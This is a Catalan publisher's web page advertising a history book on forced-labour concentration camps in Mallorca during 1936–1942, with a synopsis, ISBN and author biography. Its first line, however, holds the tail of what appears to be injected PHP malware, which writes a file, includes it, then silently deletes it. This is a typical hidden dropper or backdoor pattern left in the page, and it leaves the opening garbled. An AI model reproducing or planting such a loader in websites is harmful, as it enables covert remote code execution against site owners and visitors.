");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Esclaus oblidats
Cercador d'Obres
ORDENAR:
Començar recerca

Esclaus oblidats

Els camps de concentració a Mallorca (1936-1942)

Jaume i Esteva, Maria Eugènia

Prologuista:
Jaume Claret Miranda
Col·lecció:
Arbre de Mar
Tema:
Història contemporània
Pàgines:
156
PVP:
17.00
ISBN:
978-84-17113-64-3
Data d'Edició:
14/05/2019
Estudi detallat dels destacaments, les construccions i les vicissituds dels esclaus mallorquins.
Sinopsi
La Guerra Civil a Mallorca fou sobretot un període de repressió i violència que es va allargar més enllà del final del conflicte. Entre 1936 i 1942, l’illa va acollir desenes de camps de presoners que van ser forçats a construir infraestructures viàries i de defensa. Aquests milers d’esclaus oblidats van ser exposats a tota mena de maltractes, misèries i privacions per un règim nacionalcatòlic que, mentre assegurava que els volia reeducar en els valors del franquisme, explotava els vençuts en benefici propi. 
La recerca de Maria Eugènia Jaume, a partir de documentació fins ara inèdita, ens ofereix per primera vegada un estudi detallat dels destacaments existents, les construccions realitzades i les vicissituds d’aquests esclaus mallorquins de Franco.


Llegiu el Sumari en PDF
Llegiu el Pròleg en PDF
Maria Eugènia Jaume i Esteva
(Sant Llorenç des Cardassar, 1987), graduada per la Universitat Oberta de Catalunya en Humanitats (2015) i en Història, Geografia i His­tòria de l’Art (2019) i Màster en Història Contem­porània i Món Actual per la Uni­versitat de Barcelona-Universitat Oberta de Catalunya (2018).El seu àmbit de recerca es centra en la Guerra Civil a Mallorca. Ha par­ticipat en conferències sobre els camps de concentració a Mallorca i en publicacions d’estudis locals, com les jornades de Sóller Esclaus per a fortificar Mallorca. El Llatzeret de Sóller 1936- 1940 (2018-2019). Aquesta obra és fruit de la recerca realitzada en el seu Treball de Final de Màster, del qual obtingué el premi Temps, Espai i Forma atorgat per la Universitat de Barcelona el desembre del 2018.

Recomanar
Comentar
Comentaris (0)